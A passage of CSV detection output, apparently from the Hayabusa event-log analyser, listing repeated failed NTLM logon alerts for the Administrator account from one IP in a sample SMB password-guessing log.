+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EMvTo7fU6J468WE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8gzx6Vr9LoInM1df | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwXC2S4HwdwNE6SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pQa1WxSt3bj9LEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fm65jq9tRQznmWPh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd8BJbXvEoaDADLc | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P0JlFw7S6jFUt4Iy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rfMbFXQcP5sA2wmf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xu4pgyCcDjl9h0Et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B00w8dZG3sT2Lsqo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aKGq6qrchp4SLvT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.568 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnScYHBCKOSHItsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r8UMBM326M7a4njd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kTdYWOi6p7etRfya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JWSlcEVzj5lGtVg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xc77wukLTPOYAzj2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4WmTwTGuwDN6YXn | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeN4cSffFA04oOje | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eYFPV1kGALqX8jyO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIlhxT4qqo5bCsU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: btoOskH0112h7MTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWUhQJBcS7XbMJUq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.004 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E70qmXDDWqmWJjyU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oX0L8wf6nt2grLvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0D8BwniiXsjfkYqE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSWYo4mphuvKHQHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: im8an1mDle9f8skd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aOyLWd5CAAjnJt3C | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7gI55uWlshCLw3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l7UogJ8bBw6Epbht | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIl0QRFHXCVAHWdV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OxPv9v4TxFvS9JMy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHMGfCorrLXpDyeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.452 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KQTKgFibIa8NWExO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEnx3upH3Om0wHn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KlNbW1ljPSTdgUKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w2WMd3HugfjSwJPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yEy0C6dMhysbNDrX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxlayd8pnAZ3dZ2Q | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PhKO1jyWqVEdC9w2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dAH2mHJ4ZK5GS2p0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lV2ZIWGGwlkyEMRB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sum2yMFio9KLwZk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fICXSRvv9Vm0uVpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.894 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IgrOk6Fjp0QtfJ3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OPKoHLtxNoiG65sl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NctXRH1DR3slfVxQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vLnAs36K1mTivu2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7crZQ0eQ5RDNIp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yHjgGhEtZgNwjaii | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5gi2SS2mQiDylQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kqWJGguiWBEplJiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWP4luPa3lFolQVI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5K9DQWbzslRZZMSC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qm0L113v24jlfjx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.360 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seuUjyGmNlyYT4tU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FljAF4LWLmWNa3kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RnN5mBOaAvYu25G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llBt31S46QVzg0Ki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1rvJUZo91Kka0G1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Zqi86ZSFGRnoFM4 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GeyeVdCUmHEKxR8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DwxJVXt79KBZalqS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TDfRu1OTlHmyc38P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLCAMPDWti9hjHtV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k2eViuJeorX2peGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.868 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: davOE9p1fF2LbDP7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFQsEbZnm94eSuUl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnNcBIPoWdJH0x7M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Fw1xVFyar0Cal2J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWzn4Oa8PQdH9Gqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b68beIB5BKyMv8d3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HeXSJhEXzpiRX8BT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQ8Zu7ByLWddD4Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: paQzUptV8scmJvsG | IP Addr: 192.168.198.149 | AuthPackage: 